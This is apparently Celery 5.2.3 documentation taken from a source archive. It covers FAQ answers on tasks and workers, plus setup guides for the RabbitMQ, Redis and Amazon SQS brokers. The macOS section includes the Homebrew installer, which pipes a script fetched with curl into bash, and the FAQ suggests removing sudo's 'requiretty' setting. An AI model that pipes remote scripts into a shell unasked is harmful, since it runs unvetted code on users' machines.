Celery with ActiveMQ/STOMP? ------------------------------------- **Answer**: No. It used to be supported by :pypi:`Carrot` (our old messaging library) but isn't currently supported in :pypi:`Kombu` (our new messaging library). .. _faq-non-amqp-missing-features: What features aren't supported when not using an AMQP broker? ------------------------------------------------------------- This is an incomplete list of features not available when using the virtual transports: * Remote control commands (supported only by Redis). * Monitoring with events may not work in all virtual transports. * The `header` and `fanout` exchange types (`fanout` is supported by Redis). .. _faq-tasks: Tasks ===== .. _faq-tasks-connection-reuse: How can I reuse the same connection when calling tasks? ------------------------------------------------------- **Answer**: See the :setting:`broker_pool_limit` setting. The connection pool is enabled by default since version 2.5. .. _faq-sudo-subprocess: :command:`sudo` in a :mod:`subprocess` returns :const:`None` ------------------------------------------------------------ There's a :command:`sudo` configuration option that makes it illegal for process without a tty to run :command:`sudo`: .. code-block:: text Defaults requiretty If you have this configuration in your :file:`/etc/sudoers` file then tasks won't be able to call :command:`sudo` when the worker is running as a daemon. If you want to enable that, then you need to remove the line from :file:`/etc/sudoers`. See: http://timelordz.com/wiki/Apache_Sudo_Commands .. _faq-deletes-unknown-tasks: Why do workers delete tasks from the queue if they're unable to process them? ----------------------------------------------------------------------------- **Answer**: The worker rejects unknown tasks, messages with encoding errors and messages that don't contain the proper fields (as per the task message protocol). If it didn't reject them they could be redelivered again and again, causing a loop. Recent versions of RabbitMQ has the ability to configure a dead-letter queue for exchange, so that rejected messages is moved there. .. 
_faq-execute-task-by-name: Can I call a task by name? ----------------------------- **Answer**: Yes, use :meth:`@send_task`. You can also call a task by name, from any language, using an AMQP client: .. code-block:: python >>> app.send_task('tasks.add', args=[2, 2], kwargs={}) To use ``chain``, ``chord`` or ``group`` with tasks called by name, use the :meth:`@Celery.signature` method: .. code-block:: python >>> chain( ... app.signature('tasks.add', args=[2, 2], kwargs={}), ... app.signature('tasks.add', args=[1, 1], kwargs={}) ... ).apply_async() .. _faq-get-current-task-id: Can I get the task id of the current task? ---------------------------------------------- **Answer**: Yes, the current id and more is available in the task request:: @app.task(bind=True) def mytask(self): cache.set(self.request.id, "Running") For more information see :ref:`task-request-info`. If you don't have a reference to the task instance you can use :attr:`app.current_task <@current_task>`: .. code-block:: python >>> app.current_task.request.id But note that this will be any task, be it one executed by the worker, or a task called directly by that task, or a task called eagerly. To get the current task being worked on specifically, use :attr:`app.current_worker_task <@current_worker_task>`: .. code-block:: python >>> app.current_worker_task.request.id .. note:: Both :attr:`~@current_task`, and :attr:`~@current_worker_task` can be :const:`None`. .. _faq-custom-task-ids: Can I specify a custom task_id? ------------------------------- **Answer**: Yes, use the `task_id` argument to :meth:`Task.apply_async`: .. code-block:: pycon >>> task.apply_async(args, kwargs, task_id='…') Can I use decorators with tasks? -------------------------------- **Answer**: Yes, but please see note in the sidebar at :ref:`task-basics`. .. _faq-natural-task-ids: Can I use natural task ids? --------------------------- **Answer**: Yes, but make sure it's unique, as the behavior for two tasks existing with the same id is undefined. The world will probably not explode, but they can definitely overwrite each others results. .. _faq-task-callbacks: Can I run a task once another task has finished? ------------------------------------------------ **Answer**: Yes, you can safely launch a task inside a task. A common pattern is to add callbacks to tasks: .. code-block:: python from celery.utils.log import get_task_logger logger = get_task_logger(__name__) @app.task def add(x, y): return x + y @app.task(ignore_result=True) def log_result(result): logger.info("log_result got: %r", result) Invocation: .. code-block:: pycon >>> (add.s(2, 2) | log_result.s()).delay() See :doc:`userguide/canvas` for more information. .. _faq-cancel-task: Can I cancel the execution of a task? ------------------------------------- **Answer**: Yes, Use :meth:`result.revoke() `: .. code-block:: pycon >>> result = add.apply_async(args=[2, 2], countdown=120) >>> result.revoke() or if you only have the task id: .. code-block:: pycon >>> from proj.celery import app >>> app.control.revoke(task_id) The latter also support passing a list of task-ids as argument. .. _faq-node-not-receiving-broadcast-commands: Why aren't my remote control commands received by all workers? -------------------------------------------------------------- **Answer**: To receive broadcast remote control commands, every worker node creates a unique queue name, based on the nodename of the worker. 
If you have more than one worker with the same host name, the control commands will be received in round-robin between them. To work around this you can explicitly set the nodename for every worker using the :option:`-n ` argument to :mod:`~celery.bin.worker`: .. code-block:: console $ celery -A proj worker -n worker1@%h $ celery -A proj worker -n worker2@%h where ``%h`` expands into the current hostname. .. _faq-task-routing: Can I send some tasks to only some servers? -------------------------------------------- **Answer:** Yes, you can route tasks to one or more workers, using different message routing topologies, and a worker instance can bind to multiple queues. See :doc:`userguide/routing` for more information. .. _faq-disable-prefetch: Can I disable prefetching of tasks? ----------------------------------- **Answer**: Maybe! The AMQP term "prefetch" is confusing, as it's only used to describe the task prefetching *limit*. There's no actual prefetching involved. Disabling the prefetch limits is possible, but that means the worker will consume as many tasks as it can, as fast as possible. A discussion on prefetch limits, and configuration settings for a worker that only reserves one task at a time is found here: :ref:`optimizing-prefetch-limit`. .. _faq-change-periodic-task-interval-at-runtime: Can I change the interval of a periodic task at runtime? -------------------------------------------------------- **Answer**: Yes, you can use the Django database scheduler, or you can create a new schedule subclass and override :meth:`~celery.schedules.schedule.is_due`: .. code-block:: python from celery.schedules import schedule class my_schedule(schedule): def is_due(self, last_run_at): return run_now, next_time_to_check .. _faq-task-priorities: Does Celery support task priorities? ------------------------------------ **Answer**: Yes, RabbitMQ supports priorities since version 3.5.0, and the Redis transport emulates priority support. You can also prioritize work by routing high priority tasks to different workers. In the real world this usually works better than per message priorities. You can use this in combination with rate limiting, and per message priorities to achieve a responsive system. .. _faq-acks_late-vs-retry: Should I use retry or acks_late? -------------------------------- **Answer**: Depends. It's not necessarily one or the other, you may want to use both. `Task.retry` is used to retry tasks, notably for expected errors that is catch-able with the :keyword:`try` block. The AMQP transaction isn't used for these errors: **if the task raises an exception it's still acknowledged!** The `acks_late` setting would be used when you need the task to be executed again if the worker (for some reason) crashes mid-execution. It's important to note that the worker isn't known to crash, and if it does it's usually an unrecoverable error that requires human intervention (bug in the worker, or task code). In an ideal world you could safely retry any task that's failed, but this is rarely the case. Imagine the following task: .. code-block:: python @app.task def process_upload(filename, tmpfile): # Increment a file count stored in a database increment_file_counter() add_file_metadata_to_db(filename, tmpfile) copy_file_to_destination(filename, tmpfile) If this crashed in the middle of copying the file to its destination the world would contain incomplete state. This isn't a critical scenario of course, but you can probably imagine something far more sinister. 
So for ease of programming we have less reliability; It's a good default, users who require it and know what they are doing can still enable acks_late (and in the future hopefully use manual acknowledgment). In addition `Task.retry` has features not available in AMQP transactions: delay between retries, max retries, etc. So use retry for Python errors, and if your task is idempotent combine that with `acks_late` if that level of reliability is required. .. _faq-schedule-at-specific-time: Can I schedule tasks to execute at a specific time? --------------------------------------------------- **Answer**: Yes. You can use the `eta` argument of :meth:`Task.apply_async`. See also :ref:`guide-beat`. .. _faq-safe-worker-shutdown: Can I safely shut down the worker? ---------------------------------- **Answer**: Yes, use the :sig:`TERM` signal. This will tell the worker to finish all currently executing jobs and shut down as soon as possible. No tasks should be lost even with experimental transports as long as the shutdown completes. You should never stop :mod:`~celery.bin.worker` with the :sig:`KILL` signal (``kill -9``), unless you've tried :sig:`TERM` a few times and waited a few minutes to let it get a chance to shut down. Also make sure you kill the main worker process only, not any of its child processes. You can direct a kill signal to a specific child process if you know the process is currently executing a task the worker shutdown is depending on, but this also means that a ``WorkerLostError`` state will be set for the task so the task won't run again. Identifying the type of process is easier if you have installed the :pypi:`setproctitle` module: .. code-block:: console $ pip install setproctitle With this library installed you'll be able to see the type of process in :command:`ps` listings, but the worker must be restarted for this to take effect. .. seealso:: :ref:`worker-stopping` .. _faq-daemonizing: Can I run the worker in the background on [platform]? ----------------------------------------------------- **Answer**: Yes, please see :ref:`daemonizing`. .. _faq-django: Django ====== .. _faq-django-beat-database-tables: What purpose does the database tables created by ``django-celery-beat`` have? ----------------------------------------------------------------------------- When the database-backed schedule is used the periodic task schedule is taken from the ``PeriodicTask`` model, there are also several other helper tables (``IntervalSchedule``, ``CrontabSchedule``, ``PeriodicTasks``). .. _faq-django-result-database-tables: What purpose does the database tables created by ``django-celery-results`` have? -------------------------------------------------------------------------------- The Django database result backend extension requires two extra models: ``TaskResult`` and ``GroupResult``. .. _faq-windows: Windows ======= .. _faq-windows-worker-embedded-beat: Does Celery support Windows? ---------------------------------------------------------------- **Answer**: No. Since Celery 4.x, Windows is no longer supported due to lack of resources. But it may still work and we are happy to accept patches. 
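As a footnote to the scheduling answer earlier in this FAQ (*Can I schedule tasks to execute at a specific time?*), here is a minimal sketch of passing an ``eta`` to :meth:`Task.apply_async`; the ``add`` task and the ten-minute offset are purely illustrative:

.. code-block:: pycon

    >>> from datetime import datetime, timedelta, timezone

    >>> # Run roughly ten minutes from now; ``eta`` expects an absolute datetime.
    >>> add.apply_async((2, 2), eta=datetime.now(timezone.utc) + timedelta(minutes=10))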
././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5517523 celery-5.2.3/docs/getting-started/0000775000175000017500000000000000000000000016732 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5557525 celery-5.2.3/docs/getting-started/backends-and-brokers/0000775000175000017500000000000000000000000022711 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/backends-and-brokers/index.rst0000664000175000017500000000755400000000000024565 0ustar00asifasif00000000000000.. _brokers: ====================== Backends and Brokers ====================== :Release: |version| :Date: |today| Celery supports several message transport alternatives. .. _broker_toc: Broker Instructions =================== .. toctree:: :maxdepth: 1 rabbitmq redis sqs .. _broker-overview: Broker Overview =============== This is comparison table of the different transports supports, more information can be found in the documentation for each individual transport (see :ref:`broker_toc`). +---------------+--------------+----------------+--------------------+ | **Name** | **Status** | **Monitoring** | **Remote Control** | +---------------+--------------+----------------+--------------------+ | *RabbitMQ* | Stable | Yes | Yes | +---------------+--------------+----------------+--------------------+ | *Redis* | Stable | Yes | Yes | +---------------+--------------+----------------+--------------------+ | *Amazon SQS* | Stable | No | No | +---------------+--------------+----------------+--------------------+ | *Zookeeper* | Experimental | No | No | +---------------+--------------+----------------+--------------------+ Experimental brokers may be functional but they don't have dedicated maintainers. Missing monitor support means that the transport doesn't implement events, and as such Flower, `celery events`, `celerymon` and other event-based monitoring tools won't work. Remote control means the ability to inspect and manage workers at runtime using the `celery inspect` and `celery control` commands (and other tools using the remote control API). Summaries ========= *Note: This section is not comprehensive of backends and brokers.* Celery has the ability to communicate and store with many different backends (Result Stores) and brokers (Message Transports). Redis ----- Redis can be both a backend and a broker. **As a Broker:** Redis works well for rapid transport of small messages. Large messages can congest the system. :ref:`See documentation for details ` **As a Backend:** Redis is a super fast K/V store, making it very efficient for fetching the results of a task call. As with the design of Redis, you do have to consider the limit memory available to store your data, and how you handle data persistence. If result persistence is important, consider using another DB for your backend. RabbitMQ -------- RabbitMQ is a broker. **As a Broker:** RabbitMQ handles larger messages better than Redis, however if many messages are coming in very quickly, scaling can become a concern and Redis or SQS should be considered unless RabbitMQ is running at very large scale. :ref:`See documentation for details ` **As a Backend:** RabbitMQ can store results via ``rpc://`` backend. This backend creates separate temporary queue for each client. 
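For instance, a minimal sketch of using RabbitMQ in both roles, with placeholder credentials, could look like this:

.. code-block:: python

    from celery import Celery

    # Broker and rpc:// result backend both point at the same RabbitMQ instance;
    # the user, password and vhost below are placeholders.
    app = Celery(
        'proj',
        broker='amqp://myuser:mypassword@localhost:5672/myvhost',
        backend='rpc://',
    )

Keep in mind that ``rpc://`` results are transient and meant to be retrieved by the client that sent the task, not to serve as a persistent result store.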
*Note: RabbitMQ (as the broker) and Redis (as the backend) are very commonly used together. If more guaranteed long-term persistence is needed from the result store, consider using PostgreSQL or MySQL (through SQLAlchemy), Cassandra, or a custom defined backend.* SQS --- SQS is a broker. If you already integrate tightly with AWS, and are familiar with SQS, it presents a great option as a broker. It is extremely scalable and completely managed, and manages task delegation similarly to RabbitMQ. It does lack some of the features of the RabbitMQ broker such as ``worker remote control commands``. :ref:`See documentation for details ` SQLAlchemy ---------- SQLAlchemy is backend. It allows Celery to interface with MySQL, PostgreSQL, SQlite, and more. It is a ORM, and is the way Celery can use a SQL DB as a result backend. Historically, SQLAlchemy has not been the most stable result backend so if chosen one should proceed with caution. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/backends-and-brokers/rabbitmq.rst0000664000175000017500000001161200000000000025245 0ustar00asifasif00000000000000.. _broker-rabbitmq: ================ Using RabbitMQ ================ .. contents:: :local: Installation & Configuration ============================ RabbitMQ is the default broker so it doesn't require any additional dependencies or initial configuration, other than the URL location of the broker instance you want to use: .. code-block:: python broker_url = 'amqp://myuser:mypassword@localhost:5672/myvhost' For a description of broker URLs and a full list of the various broker configuration options available to Celery, see :ref:`conf-broker-settings`, and see below for setting up the username, password and vhost. .. _installing-rabbitmq: Installing the RabbitMQ Server ============================== See `Installing RabbitMQ`_ over at RabbitMQ's website. For macOS see `Installing RabbitMQ on macOS`_. .. _`Installing RabbitMQ`: http://www.rabbitmq.com/install.html .. note:: If you're getting `nodedown` errors after installing and using :command:`rabbitmqctl` then this blog post can help you identify the source of the problem: http://www.somic.org/2009/02/19/on-rabbitmqctl-and-badrpcnodedown/ .. _rabbitmq-configuration: Setting up RabbitMQ ------------------- To use Celery we need to create a RabbitMQ user, a virtual host and allow that user access to that virtual host: .. code-block:: console $ sudo rabbitmqctl add_user myuser mypassword .. code-block:: console $ sudo rabbitmqctl add_vhost myvhost .. code-block:: console $ sudo rabbitmqctl set_user_tags myuser mytag .. code-block:: console $ sudo rabbitmqctl set_permissions -p myvhost myuser ".*" ".*" ".*" Substitute in appropriate values for ``myuser``, ``mypassword`` and ``myvhost`` above. See the RabbitMQ `Admin Guide`_ for more information about `access control`_. .. _`Admin Guide`: http://www.rabbitmq.com/admin-guide.html .. _`access control`: http://www.rabbitmq.com/admin-guide.html#access-control .. _rabbitmq-macOS-installation: Installing RabbitMQ on macOS ---------------------------- The easiest way to install RabbitMQ on macOS is using `Homebrew`_ the new and shiny package management system for macOS. First, install Homebrew using the one-line command provided by the `Homebrew documentation`_: .. 
code-block:: console /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" Finally, we can install RabbitMQ using :command:`brew`: .. code-block:: console $ brew install rabbitmq .. _`Homebrew`: https://github.com/mxcl/homebrew/ .. _`Homebrew documentation`: https://github.com/Homebrew/homebrew/wiki/Installation .. _rabbitmq-macOS-system-hostname: After you've installed RabbitMQ with :command:`brew` you need to add the following to your path to be able to start and stop the broker: add it to the start-up file for your shell (e.g., :file:`.bash_profile` or :file:`.profile`). .. code-block:: bash PATH=$PATH:/usr/local/sbin Configuring the system host name ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If you're using a DHCP server that's giving you a random host name, you need to permanently configure the host name. This is because RabbitMQ uses the host name to communicate with nodes. Use the :command:`scutil` command to permanently set your host name: .. code-block:: console $ sudo scutil --set HostName myhost.local Then add that host name to :file:`/etc/hosts` so it's possible to resolve it back into an IP address:: 127.0.0.1 localhost myhost myhost.local If you start the :command:`rabbitmq-server`, your rabbit node should now be `rabbit@myhost`, as verified by :command:`rabbitmqctl`: .. code-block:: console $ sudo rabbitmqctl status Status of node rabbit@myhost ... [{running_applications,[{rabbit,"RabbitMQ","1.7.1"}, {mnesia,"MNESIA CXC 138 12","4.4.12"}, {os_mon,"CPO CXC 138 46","2.2.4"}, {sasl,"SASL CXC 138 11","2.1.8"}, {stdlib,"ERTS CXC 138 10","1.16.4"}, {kernel,"ERTS CXC 138 10","2.13.4"}]}, {nodes,[rabbit@myhost]}, {running_nodes,[rabbit@myhost]}] ...done. This is especially important if your DHCP server gives you a host name starting with an IP address, (e.g., `23.10.112.31.comcast.net`). In this case RabbitMQ will try to use `rabbit@23`: an illegal host name. .. _rabbitmq-macOS-start-stop: Starting/Stopping the RabbitMQ server ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To start the server: .. code-block:: console $ sudo rabbitmq-server you can also run it in the background by adding the ``-detached`` option (note: only one dash): .. code-block:: console $ sudo rabbitmq-server -detached Never use :command:`kill` (:manpage:`kill(1)`) to stop the RabbitMQ server, but rather use the :command:`rabbitmqctl` command: .. code-block:: console $ sudo rabbitmqctl stop When the server is running, you can continue reading `Setting up RabbitMQ`_. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/backends-and-brokers/redis.rst0000664000175000017500000001447600000000000024565 0ustar00asifasif00000000000000.. _broker-redis: ============= Using Redis ============= .. _broker-redis-installation: Installation ============ For the Redis support you have to install additional dependencies. You can install both Celery and these dependencies in one go using the ``celery[redis]`` :ref:`bundle `: .. code-block:: console $ pip install -U "celery[redis]" .. _broker-redis-configuration: Configuration ============= Configuration is easy, just configure the location of your Redis database: .. code-block:: python app.conf.broker_url = 'redis://localhost:6379/0' Where the URL is in the format of: .. code-block:: text redis://:password@hostname:port/db_number all fields after the scheme are optional, and will default to ``localhost`` on port 6379, using database 0. 
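For example, a broker URL with every optional field filled in might look like the following; the password, host name and database number are placeholders:

.. code-block:: python

    # Password ``mysecret``, host ``redis.example.com``, port 6379, database 1 --
    # all values here are illustrative.
    app.conf.broker_url = 'redis://:mysecret@redis.example.com:6379/1'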
If a Unix socket connection should be used, the URL needs to be in the format: .. code-block:: text redis+socket:///path/to/redis.sock Specifying a different database number when using a Unix socket is possible by adding the ``virtual_host`` parameter to the URL: .. code-block:: text redis+socket:///path/to/redis.sock?virtual_host=db_number It is also easy to connect directly to a list of Redis Sentinel: .. code-block:: python app.conf.broker_url = 'sentinel://localhost:26379;sentinel://localhost:26380;sentinel://localhost:26381' app.conf.broker_transport_options = { 'master_name': "cluster1" } Additional options can be passed to the Sentinel client using ``sentinel_kwargs``: .. code-block:: python app.conf.broker_transport_options = { 'sentinel_kwargs': { 'password': "password" } } .. _redis-visibility_timeout: Visibility Timeout ------------------ The visibility timeout defines the number of seconds to wait for the worker to acknowledge the task before the message is redelivered to another worker. Be sure to see :ref:`redis-caveats` below. This option is set via the :setting:`broker_transport_options` setting: .. code-block:: python app.conf.broker_transport_options = {'visibility_timeout': 3600} # 1 hour. The default visibility timeout for Redis is 1 hour. .. _redis-results-configuration: Results ------- If you also want to store the state and return values of tasks in Redis, you should configure these settings:: app.conf.result_backend = 'redis://localhost:6379/0' For a complete list of options supported by the Redis result backend, see :ref:`conf-redis-result-backend`. If you are using Sentinel, you should specify the master_name using the :setting:`result_backend_transport_options` setting: .. code-block:: python app.conf.result_backend_transport_options = {'master_name': "mymaster"} .. _redis-result-backend-timeout: Connection timeouts ^^^^^^^^^^^^^^^^^^^ To configure the connection timeouts for the Redis result backend, use the ``retry_policy`` key under :setting:`result_backend_transport_options`: .. code-block:: python app.conf.result_backend_transport_options = { 'retry_policy': { 'timeout': 5.0 } } See :func:`~kombu.utils.functional.retry_over_time` for the possible retry policy options. .. _redis-caveats: Caveats ======= Visibility timeout ------------------ If a task isn't acknowledged within the :ref:`redis-visibility_timeout` the task will be redelivered to another worker and executed. This causes problems with ETA/countdown/retry tasks where the time to execute exceeds the visibility timeout; in fact if that happens it will be executed again, and again in a loop. So you have to increase the visibility timeout to match the time of the longest ETA you're planning to use. Note that Celery will redeliver messages at worker shutdown, so having a long visibility timeout will only delay the redelivery of 'lost' tasks in the event of a power failure or forcefully terminated workers. Periodic tasks won't be affected by the visibility timeout, as this is a concept separate from ETA/countdown. You can increase this timeout by configuring a transport option with the same name: .. code-block:: python app.conf.broker_transport_options = {'visibility_timeout': 43200} The value must be an int describing the number of seconds. Key eviction ------------ Redis may evict keys from the database in some situations If you experience an error like: .. code-block:: text InconsistencyError: Probably the key ('_kombu.binding.celery') has been removed from the Redis database. 
then you may want to configure the :command:`redis-server` to not evict keys by setting in the redis configuration file: - the ``maxmemory`` option - the ``maxmemory-policy`` option to ``noeviction`` or ``allkeys-lru`` See Redis server documentation about Eviction Policies for details: https://redis.io/topics/lru-cache .. _redis-group-result-ordering: Group result ordering --------------------- Versions of Celery up to and including 4.4.6 used an unsorted list to store result objects for groups in the Redis backend. This can cause those results to be be returned in a different order to their associated tasks in the original group instantiation. Celery 4.4.7 introduced an opt-in behaviour which fixes this issue and ensures that group results are returned in the same order the tasks were defined, matching the behaviour of other backends. In Celery 5.0 this behaviour was changed to be opt-out. The behaviour is controlled by the `result_chord_ordered` configuration option which may be set like so: .. code-block:: python # Specifying this for workers running Celery 4.4.6 or earlier has no effect app.conf.result_backend_transport_options = { 'result_chord_ordered': True # or False } This is an incompatible change in the runtime behaviour of workers sharing the same Redis backend for result storage, so all workers must follow either the new or old behaviour to avoid breakage. For clusters with some workers running Celery 4.4.6 or earlier, this means that workers running 4.4.7 need no special configuration and workers running 5.0 or later must have `result_chord_ordered` set to `False`. For clusters with no workers running 4.4.6 or earlier but some workers running 4.4.7, it is recommended that `result_chord_ordered` be set to `True` for all workers to ease future migration. Migration between behaviours will disrupt results currently held in the Redis backend and cause breakage if downstream tasks are run by migrated workers - plan accordingly. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/docs/getting-started/backends-and-brokers/sqs.rst0000664000175000017500000002440500000000000024256 0ustar00asifasif00000000000000.. _broker-sqs: ================== Using Amazon SQS ================== .. _broker-sqs-installation: Installation ============ For the Amazon SQS support you have to install additional dependencies. You can install both Celery and these dependencies in one go using the ``celery[sqs]`` :ref:`bundle `: .. code-block:: console $ pip install celery[sqs] .. _broker-sqs-configuration: Configuration ============= You have to specify SQS in the broker URL:: broker_url = 'sqs://ABCDEFGHIJKLMNOPQRST:ZYXK7NiynGlTogH8Nj+P9nlE73sq3@' where the URL format is: .. code-block:: text sqs://aws_access_key_id:aws_secret_access_key@ Please note that you must remember to include the ``@`` sign at the end and encode the password so it can always be parsed correctly. For example: .. code-block:: python from kombu.utils.url import safequote aws_access_key = safequote("ABCDEFGHIJKLMNOPQRST") aws_secret_key = safequote("ZYXK7NiynG/TogH8Nj+P9nlE73sq3") broker_url = "sqs://{aws_access_key}:{aws_secret_key}@".format( aws_access_key=aws_access_key, aws_secret_key=aws_secret_key, ) .. warning:: Don't use this setup option with django's ``debug=True``. It may lead to security issues within deployed django apps. 
In debug mode django shows environment variables and the SQS URL may be exposed to the internet including your AWS access and secret keys. Please turn off debug mode on your deployed django application or consider a setup option described below. The login credentials can also be set using the environment variables :envvar:`AWS_ACCESS_KEY_ID` and :envvar:`AWS_SECRET_ACCESS_KEY`, in that case the broker URL may only be ``sqs://``. If you are using IAM roles on instances, you can set the BROKER_URL to: ``sqs://`` and kombu will attempt to retrieve access tokens from the instance metadata. Options ======= Region ------ The default region is ``us-east-1`` but you can select another region by configuring the :setting:`broker_transport_options` setting:: broker_transport_options = {'region': 'eu-west-1'} .. seealso:: An overview of Amazon Web Services regions can be found here: http://aws.amazon.com/about-aws/globalinfrastructure/ Visibility Timeout ------------------ The visibility timeout defines the number of seconds to wait for the worker to acknowledge the task before the message is redelivered to another worker. Also see caveats below. This option is set via the :setting:`broker_transport_options` setting:: broker_transport_options = {'visibility_timeout': 3600} # 1 hour. The default visibility timeout is 30 minutes. Polling Interval ---------------- The polling interval decides the number of seconds to sleep between unsuccessful polls. This value can be either an int or a float. By default the value is *one second*: this means the worker will sleep for one second when there's no more messages to read. You must note that **more frequent polling is also more expensive, so increasing the polling interval can save you money**. The polling interval can be set via the :setting:`broker_transport_options` setting:: broker_transport_options = {'polling_interval': 0.3} Very frequent polling intervals can cause *busy loops*, resulting in the worker using a lot of CPU time. If you need sub-millisecond precision you should consider using another transport, like `RabbitMQ `, or `Redis `. Long Polling ------------ `SQS Long Polling`_ is enabled by default and the ``WaitTimeSeconds`` parameter of `ReceiveMessage`_ operation is set to 10 seconds. The value of ``WaitTimeSeconds`` parameter can be set via the :setting:`broker_transport_options` setting:: broker_transport_options = {'wait_time_seconds': 15} Valid values are 0 to 20. Note that newly created queues themselves (also if created by Celery) will have the default value of 0 set for the "Receive Message Wait Time" queue property. .. _`SQS Long Polling`: https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-long-polling.html .. 
_`ReceiveMessage`: https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_ReceiveMessage.html Queue Prefix ------------ By default Celery won't assign any prefix to the queue names, If you have other services using SQS you can configure it do so using the :setting:`broker_transport_options` setting:: broker_transport_options = {'queue_name_prefix': 'celery-'} Predefined Queues ----------------- If you want Celery to use a set of predefined queues in AWS, and to never attempt to list SQS queues, nor attempt to create or delete them, pass a map of queue names to URLs using the :setting:`predefined_queues` setting:: broker_transport_options = { 'predefined_queues': { 'my-q': { 'url': 'https://ap-southeast-2.queue.amazonaws.com/123456/my-q', 'access_key_id': 'xxx', 'secret_access_key': 'xxx', } } } Back-off policy ------------------------ Back-off policy is using SQS visibility timeout mechanism altering the time difference between task retries. The mechanism changes message specific ``visibility timeout`` from queue ``Default visibility timeout`` to policy configured timeout. The number of retries is managed by SQS (specifically by the ``ApproximateReceiveCount`` message attribute) and no further action is required by the user. Configuring the queues and backoff policy:: broker_transport_options = { 'predefined_queues': { 'my-q': { 'url': 'https://ap-southeast-2.queue.amazonaws.com/123456/my-q', 'access_key_id': 'xxx', 'secret_access_key': 'xxx', 'backoff_policy': {1: 10, 2: 20, 3: 40, 4: 80, 5: 320, 6: 640}, 'backoff_tasks': ['svc.tasks.tasks.task1'] } } } ``backoff_policy`` dictionary where key is number of retries, and value is delay seconds between retries (i.e SQS visibility timeout) ``backoff_tasks`` list of task names to apply the above policy The above policy: +-----------------------------------------+--------------------------------------------+ | **Attempt** | **Delay** | +-----------------------------------------+--------------------------------------------+ | ``2nd attempt`` | 20 seconds | +-----------------------------------------+--------------------------------------------+ | ``3rd attempt`` | 40 seconds | +-----------------------------------------+--------------------------------------------+ | ``4th attempt`` | 80 seconds | +-----------------------------------------+--------------------------------------------+ | ``5th attempt`` | 320 seconds | +-----------------------------------------+--------------------------------------------+ | ``6th attempt`` | 640 seconds | +-----------------------------------------+--------------------------------------------+ STS token authentication ---------------------------- https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html AWS STS authentication is supported by using the ``sts_role_arn`` and ``sts_token_timeout`` broker transport options. ``sts_role_arn`` is the assumed IAM role ARN we use to authorize our access to SQS. ``sts_token_timeout`` is the token timeout, defaults (and minimum) to 900 seconds. After the mentioned period, a new token will be created:: broker_transport_options = { 'predefined_queues': { 'my-q': { 'url': 'https://ap-southeast-2.queue.amazonaws.com/123456/my-q', 'access_key_id': 'xxx', 'secret_access_key': 'xxx', 'backoff_policy': {1: 10, 2: 20, 3: 40, 4: 80, 5: 320, 6: 640}, 'backoff_tasks': ['svc.tasks.tasks.task1'] } }, 'sts_role_arn': 'arn:aws:iam:::role/STSTest', # optional 'sts_token_timeout': 900 # optional } .. 
_sqs-caveats: Caveats ======= - If a task isn't acknowledged within the ``visibility_timeout``, the task will be redelivered to another worker and executed. This causes problems with ETA/countdown/retry tasks where the time to execute exceeds the visibility timeout; in fact if that happens it will be executed again, and again in a loop. So you have to increase the visibility timeout to match the time of the longest ETA you're planning to use. Note that Celery will redeliver messages at worker shutdown, so having a long visibility timeout will only delay the redelivery of 'lost' tasks in the event of a power failure or forcefully terminated workers. Periodic tasks won't be affected by the visibility timeout, as it is a concept separate from ETA/countdown. The maximum visibility timeout supported by AWS as of this writing is 12 hours (43200 seconds):: broker_transport_options = {'visibility_timeout': 43200} - SQS doesn't yet support worker remote control commands. - SQS doesn't yet support events, and so cannot be used with :program:`celery events`, :program:`celerymon`, or the Django Admin monitor. - With FIFO queues it might be necessary to set additional message properties such as ``MessageGroupId`` and ``MessageDeduplicationId`` when publishing a message. Message properties can be passed as keyword arguments to :meth:`~celery.app.task.Task.apply_async`: .. code-block:: python message_properties = { 'MessageGroupId': '', 'MessageDeduplicationId': '' } task.apply_async(**message_properties) .. _sqs-results-configuration: Results ------- Multiple products in the Amazon Web Services family could be a good candidate to store or publish results with, but there's no such result backend included at this point. .. warning:: Don't use the ``amqp`` result backend with SQS. It will create one queue for every task, and the queues will not be collected. This could cost you money that would be better spent contributing an AWS result store backend back to Celery :) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/first-steps-with-celery.rst0000664000175000017500000003524700000000000024214 0ustar00asifasif00000000000000.. _tut-celery: .. _first-steps: ========================= First Steps with Celery ========================= Celery is a task queue with batteries included. It's easy to use so that you can get started without learning the full complexities of the problem it solves. It's designed around best practices so that your product can scale and integrate with other languages, and it comes with the tools and support you need to run such a system in production. In this tutorial you'll learn the absolute basics of using Celery. Learn about; - Choosing and installing a message transport (broker). - Installing Celery and creating your first task. - Starting the worker and calling tasks. - Keeping track of tasks as they transition through different states, and inspecting return values. Celery may seem daunting at first - but don't worry - this tutorial will get you started in no time. It's deliberately kept simple, so as to not confuse you with advanced features. After you have finished this tutorial, it's a good idea to browse the rest of the documentation. For example the :ref:`next-steps` tutorial will showcase Celery's capabilities. .. contents:: :local: .. 
